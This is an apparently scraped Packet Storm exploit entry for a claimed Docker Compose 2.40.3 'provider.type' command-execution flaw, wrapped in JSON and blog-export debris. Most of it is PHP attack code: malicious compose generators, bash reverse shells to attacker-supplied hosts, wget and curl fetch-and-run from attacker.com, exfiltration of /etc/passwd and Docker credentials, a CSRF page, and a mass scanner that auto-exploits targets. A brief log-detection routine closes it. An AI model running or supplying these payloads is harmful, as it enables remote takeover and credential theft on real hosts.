{“lastseen”:”2025-12-15T16:53:05″,”description”:”Docker Compose version 2.40.3 proof of concept provider type PHP command execution exploit…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Docker Compose 2.40.3 Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212819″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Docker Compose v 2.40.3 Provider Type PHP Command Execution |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/docs.docker.com\/compose\/releases\/prior-releases\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212673\/ \\u0026 \\n \\n [+] Summary : Docker Compose Provider Type Command Execution is a critical vulnerability (CVE pending) that allows arbitrary command execution \\n on the host system when processing Docker Compose files containing the provider.type field. This vulnerability exists due to Docker \\n \\t\\t\\t\\t Compose’s design to execute any specified provider type as a binary or script on the host without proper validation or isolation.\\n \\n [+] POC :\\n \\n 1. Creating malicious files via PHP\\n \\n Example: A PHP page generates malicious Docker Compose files\\n \\n \\u003c?php\\n \/\/ exploit-docker-compose.php\\n if (isset($_GET[‘cmd’])) {\\n $cmd = base64_decode($_GET[‘cmd’]);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 \u0645\u062d\u062a\u0648\u0649 docker-compose.yml\\n $composeContent = \\u003c\\u003c\\u003cYAML\\n services:\\n exploit:\\n provider:\\n type: \/bin\/sh\\n command: -c \\”{$cmd}\\”\\n YAML;\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 \u0645\u062d\u062a\u0648\u0649 \u0627\u0644\u0628\u0631\u0648\u0641\u0627\u064a\u062f\u0631 \u0627\u0644\u0645\u0632\u064a\u0641 (\u0644\u0637\u0631\u0642 \u0628\u062f\u064a\u0644\u0629)\\n $scriptContent = \\”#!\/bin\/sh\\\\n{$cmd}\\\\n\\”;\\n \\n header(‘Content-Type: text\/plain’);\\n echo $composeContent;\\n exit;\\n }\\n \\n \/\/ \u0623\u0648 \u062d\u0641\u0638 \u0627\u0644\u0645\u0644\u0641 \u0639\u0644\u0649 \u0627\u0644\u062e\u0627\u062f\u0645\\n if (isset($_POST[‘save_exploit’])) {\\n $composeContent = \\u003c\\u003c\\u003cYAML\\n services:\\n backdoor:\\n provider:\\n type: \/tmp\/exploit.sh\\n YAML;\\n \\n $scriptContent = \\”#!\/bin\/sh\\\\nbash -i \\u003e\\u0026 \/dev\/tcp\/{$_POST[‘lhost’]}\/{$_POST[‘lport’]} 0\\u003e\\u00261 \\u0026\\\\n\\”;\\n \\n file_put_contents(‘\/tmp\/docker-compose.yml’, $composeContent);\\n file_put_contents(‘\/tmp\/exploit.sh’, $scriptContent);\\n chmod(‘\/tmp\/exploit.sh’, 0755);\\n \\n echo \\”Files created!\\”;\\n }\\n ?\\u003e\\n \\n Exploiting platforms that allow uploading Docker Compose files\\n \\n Example: Exploiting a control panel that allows uploading YAML files\\n \\n \\u003c?php\\n \/\/ file-upload-exploit.php\\n if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’ \\u0026\\u0026 isset($_FILES[‘dockerfile’])) {\\n $uploadDir = ‘\/var\/www\/uploads\/’;\\n $composeFile = $uploadDir . basename($_FILES[‘dockerfile’][‘name’]);\\n \\n \/\/ \u062a\u062d\u0642\u0642 \u0628\u0633\u064a\u0637 \u0644\u0644\u0645\u0644\u0641 (\u064a\u0645\u0643\u0646 \u062a\u062c\u0627\u0648\u0632\u0647)\\n if (move_uploaded_file($_FILES[‘dockerfile’][‘tmp_name’], $composeFile)) {\\n \\n \/\/ \u0645\u062d\u062a\u0648\u0649 \u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0645\u0644\u0641 compose\\n $maliciousContent = \\u003c\\u003c\\u003cYAML\\n services:\\n app:\\n image: nginx\\n provider:\\n type: \/bin\/sh\\n command: -c \\”wget http:\/\/attacker.com\/backdoor.sh -O \/tmp\/bd.sh \\u0026\\u0026 chmod +x \/tmp\/bd.sh \\u0026\\u0026 \/tmp\/bd.sh\\”\\n \\n db:\\n image: mysql\\n environment:\\n MYSQL_ROOT_PASSWORD: $(curl http:\/\/attacker.com\/steal.php?data=$(cat \/etc\/passwd|base64))\\n YAML;\\n \\n file_put_contents($composeFile, $maliciousContent);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0634\u063a\u064a\u0644 docker compose (\u0625\u0630\u0627 \u0643\u0627\u0646\u062a \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u062a\u0633\u0645\u062d)\\n if (isset($_POST[‘auto_run’])) {\\n $output = shell_exec(\\”cd $uploadDir \\u0026\\u0026 docker compose up -d 2\\u003e\\u00261\\”);\\n echo \\”\\u003cpre\\u003eOutput: $output\\u003c\/pre\\u003e\\”;\\n }\\n }\\n }\\n ?\\u003e\\n \\n \\u003cform method=\\”POST\\” enctype=\\”multipart\/form-data\\”\\u003e\\n Upload Docker Compose: \\u003cinput type=\\”file\\” name=\\”dockerfile\\”\\u003e\\n \\u003cbr\\u003e\\n Auto-run: \\u003cinput type=\\”checkbox\\” name=\\”auto_run\\”\\u003e\\n \\u003cbr\\u003e\\n \\u003cinput type=\\”submit\\” value=\\”Upload\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n 3. Exploiting API endpoints that interact with Docker\\n \\n Example: Injecting commands into an API that manages Docker containers\\n \\n \\u003c?php\\n \/\/ api-exploit.php\\n \\n \/\/ \u0645\u062d\u0627\u0643\u0627\u0629 endpoint \u0644\u0640 Docker API\\n if (isset($_POST[‘compose_config’])) {\\n $config = json_decode($_POST[‘compose_config’], true);\\n \\n \/\/ \u0646\u0642\u0637\u0629 \u0627\u0644\u0636\u0639\u0641: \u0639\u062f\u0645 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 provider.type\\n $yamlContent = yaml_emit($config);\\n \\n \/\/ \u062d\u0641\u0638 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0645\u0624\u0642\u062a\\n $tempFile = tempnam(‘\/tmp’, ‘docker_’);\\n file_put_contents($tempFile, $yamlContent);\\n \\n \/\/ \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631 (\u0645\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a)\\n $output = shell_exec(\\”docker compose -f $tempFile up 2\\u003e\\u00261\\”);\\n \\n \/\/ \u062a\u0646\u0638\u064a\u0641 (\u0642\u062f \u0644\u0627 \u064a\u0646\u0641\u0630 \u0625\u0630\u0627 \u0641\u0634\u0644 \u0627\u0644\u0623\u0645\u0631)\\n unlink($tempFile);\\n \\n echo json_encode([‘output’ =\\u003e $output]);\\n exit;\\n }\\n \\n \/\/ payload \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n $payload = [\\n ‘services’ =\\u003e [\\n ‘malicious’ =\\u003e [\\n ‘provider’ =\\u003e [\\n ‘type’ =\\u003e ‘\/bin\/sh’\\n ],\\n ‘command’ =\\u003e ‘-c \\”echo pwned \\u003e \/tmp\/hacked \\u0026\\u0026 cat \/etc\/shadow | base64 \\u003e \/tmp\/stolen\\”‘\\n ]\\n ]\\n ];\\n \\n \/\/ \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0647\u062c\u0648\u0645\\n $ch = curl_init(‘http:\/\/target.com\/api\/docker\/deploy’);\\n curl_setopt($ch, CURLOPT_POST, true);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, [\\n ‘compose_config’ =\\u003e json_encode($payload)\\n ]);\\n $response = curl_exec($ch);\\n curl_close($ch);\\n \\n echo \\”Attack sent!\\”;\\n ?\\u003e\\n \\n 4. CSRF + Docker Compose Exploit\\n \\n Example: Exploiting CSRF in the Docker Administrator Interface\\n \\n \\u003c?php\\n \/\/ csrf-exploit.html (\u064a\u062a\u0645 \u0631\u0641\u0639\u0647 \u0639\u0644\u0649 \u062e\u0627\u062f\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645)\\n ?\\u003e\\n \\u003chtml\\u003e\\n \\u003cbody\\u003e\\n \\u003cscript\\u003e\\n \/\/ CSRF \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 Docker Compose\\n fetch(‘http:\/\/victim.com\/docker\/deploy’, {\\n method: ‘POST’,\\n headers: {\\n ‘Content-Type’: ‘application\/json’,\\n },\\n body: JSON.stringify({\\n name: ‘innocent-app’,\\n compose: `services:\\n innocent:\\n image: nginx\\n provider:\\n type: \/bin\/bash\\n command: -c \\”curl http:\/\/attacker.com\/steal.sh | bash\\”\\n \\n backup:\\n image: busybox\\n command: sh -c \\”cat \/var\/lib\/docker\/config.json | base64 | curl -X POST -d @- http:\/\/attacker.com\/log\\”`\\n })\\n });\\n \\u003c\/script\\u003e\\n \\u003cimg src=\\”http:\/\/victim.com\/docker\/deploy?action=up\\u0026file=http:\/\/attacker.com\/malicious-compose.yml\\” onload=\\”alert(‘Exploited’)\\”\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\n 5. Mass Exploitation Scanner\\n \\n A scanner for searching for servers vulnerable to the exploit.\\n \\n \\u003c?php\\n \/\/ docker-scanner.php\\n class DockerComposeScanner {\\n private $targets = [];\\n \\n public function addTarget($url) {\\n $this-\\u003etargets[] = $url;\\n }\\n \\n public function scan() {\\n foreach ($this-\\u003etargets as $target) {\\n $this-\\u003etestVulnerability($target);\\n }\\n }\\n \\n private function testVulnerability($url) {\\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 1: \u0631\u0641\u0639 \u0645\u0644\u0641 \u0645\u0628\u0627\u0634\u0631\\n $testCompose = tempnam(sys_get_temp_dir(), ‘test_’);\\n $maliciousContent = \\u003c\\u003c\\u003cYAML\\n services:\\n test:\\n provider:\\n type: \/bin\/echo\\n command: VULNERABLE\\n YAML;\\n \\n file_put_contents($testCompose, $maliciousContent);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0631\u0641\u0639 \u0625\u0644\u0649 \u0627\u0644\u0647\u062f\u0641\\n $ch = curl_init($url . ‘\/upload’);\\n curl_setopt($ch, CURLOPT_POST, true);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, [\\n ‘file’ =\\u003e new CURLFile($testCompose, ‘text\/yaml’, ‘docker-compose.yml’)\\n ]);\\n $response = curl_exec($ch);\\n \\n if (strpos($response, ‘VULNERABLE’) !== false) {\\n $this-\\u003elog(\\”VULNERABLE: $url\\”);\\n $this-\\u003eexploit($url);\\n }\\n \\n unlink($testCompose);\\n }\\n \\n private function exploit($url) {\\n \/\/ \u062a\u0646\u0641\u064a\u0630 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0643\u0627\u0645\u0644\\n $reverseShell = base64_encode(‘bash -i \\u003e\\u0026 \/dev\/tcp\/ATTACKER_IP\/4444 0\\u003e\\u00261’);\\n \\n $payload = [\\n ‘compose’ =\\u003e \\u003c\\u003c\\u003cYAML\\n services:\\n exploit:\\n provider:\\n type: \/bin\/bash\\n command: -c \\”echo $reverseShell | base64 -d | bash\\”\\n YAML\\n ];\\n \\n \/\/ \u0625\u0631\u0633\u0627\u0644 Payload\\n $ch = curl_init($url . ‘\/api\/deploy’);\\n curl_setopt($ch, CURLOPT_POST, true);\\n curl_setopt($ch, CURLOPT_HTTPHEADER, [‘Content-Type: application\/json’]);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));\\n curl_exec($ch);\\n }\\n \\n private function log($message) {\\n file_put_contents(‘scan.log’, date(‘Y-m-d H:i:s’) . \\” – $message\\\\n\\”, FILE_APPEND);\\n echo \\”$message\\\\n\\”;\\n }\\n }\\n \\n \/\/ \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645\\n $scanner = new DockerComposeScanner();\\n $scanner-\\u003eaddTarget(‘http:\/\/target1.com’);\\n $scanner-\\u003eaddTarget(‘http:\/\/target2.com’);\\n $scanner-\\u003escan();\\n ?\\u003e\\n \\n 6. Webhook Exploitation\\n \\n Exploiting webhooks that launch Docker Compose\\n \\n \\u003c?php\\n \/\/ webhook-exploit.php\\n \/\/ \u0645\u0639\u0627\u0644\u062c\u0629 webhook \u0645\u0646 GitHub\/GitLab\/etc\\n \\n $payload = json_decode(file_get_contents(‘php:\/\/input’), true);\\n \\n if (isset($payload[‘ref’])) {\\n \/\/ \u0645\u062d\u0627\u0643\u0627\u0629 \u0633\u0643\u0631\u0628\u062a \u0627\u0644\u0646\u0634\u0631\\n $repoUrl = $payload[‘repository’][‘clone_url’];\\n \\n \/\/ \u0627\u0633\u062a\u0646\u0633\u0627\u062e \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639 (\u0642\u062f \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0636\u0627\u0631\u0629)\\n $cloneDir = ‘\/tmp\/repo_’ . uniqid();\\n shell_exec(\\”git clone $repoUrl $cloneDir\\”);\\n \\n \/\/ \u062a\u0634\u063a\u064a\u0644 docker compose \u0625\u0630\u0627 \u0648\u062c\u062f\\n if (file_exists(\\”$cloneDir\/docker-compose.yml\\”)) {\\n \/\/ \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631 \u0627\u0644\u0636\u0627\u0631\\n shell_exec(\\”cd $cloneDir \\u0026\\u0026 docker compose up -d\\”);\\n \\n \/\/ \u062a\u0646\u0638\u064a\u0641 (\u0642\u062f \u064a\u0641\u0634\u0644 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0647\u0646\u0627\u0643 \u0639\u0645\u0644\u064a\u0629 \u062e\u0644\u0641\u064a\u0629)\\n shell_exec(\\”rm -rf $cloneDir\\”);\\n }\\n \\n \/\/ \u0623\u0648 \u062d\u0642\u0646 \u0645\u0644\u0641 \u0636\u0627\u0631\\n $injectedCompose = \\u003c\\u003c\\u003cYAML\\n services:\\n web:\\n image: nginx\\n provider:\\n type: \/bin\/sh\\n command: -c \\”curl http:\/\/attacker.com\/c2.php?host=$(hostname) | bash\\”\\n YAML;\\n \\n file_put_contents(\\”$cloneDir\/docker-compose.yml\\”, $injectedCompose);\\n shell_exec(\\”cd $cloneDir \\u0026\\u0026 docker compose up\\”);\\n }\\n ?\\u003e\\n \\n Attack detection\\n PHP detection system:\\n \\n \\u003c?php\\n \/\/ intrusion-detection.php\\n class DockerIntrusionDetection {\\n public static function monitor() {\\n $logs = [\\n ‘\/var\/log\/docker.log’,\\n ‘\/var\/log\/syslog’,\\n ‘\/var\/log\/auth.log’\\n ];\\n \\n $patterns = [\\n ‘\/provider\\\\.type.*(\\\\\/bin\\\\\/|\\\\\/tmp\\\\\/|\\\\\/dev\\\\\/)\/’,\\n ‘\/docker compose.*(curl|wget|bash|sh).*(attacker|exploit)\/i’,\\n ‘\/execution.*(compose|docker).*(provider|type)\/i’\\n ];\\n \\n foreach ($logs as $log) {\\n if (file_exists($log)) {\\n $content = file_get_contents($log);\\n foreach ($patterns as $pattern) {\\n if (preg_match($pattern, $content)) {\\n self::alert($pattern, $log);\\n }\\n }\\n }\\n }\\n }\\n \\n private static function alert($pattern, $log) {\\n $message = \\”DOCKER EXPLOIT DETECTED!\\\\n\\”;\\n $message .= \\”Pattern: $pattern\\\\n\\”;\\n $message .= \\”Log file: $log\\\\n\\”;\\n $message .= \\”Time: \\” . date(‘Y-m-d H:i:s’) . \\”\\\\n\\”;\\n \\n \/\/ \u0625\u0631\u0633\u0627\u0644 \u062a\u0646\u0628\u064a\u0647\\n mail(‘admin@example.com’, ‘Security Alert – Docker Exploit’, $message);\\n syslog(LOG_ALERT, $message);\\n }\\n }\\n \\n \/\/ \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629\\n DockerIntrusionDetection::monitor();\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212819″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212819\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-15T16:53:05″,”description”:”Docker Compose version 2.40.3 proof of concept provider type PHP command execution exploit…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Docker Compose 2.40.3 Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212819″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Docker Compose v…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-31172","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n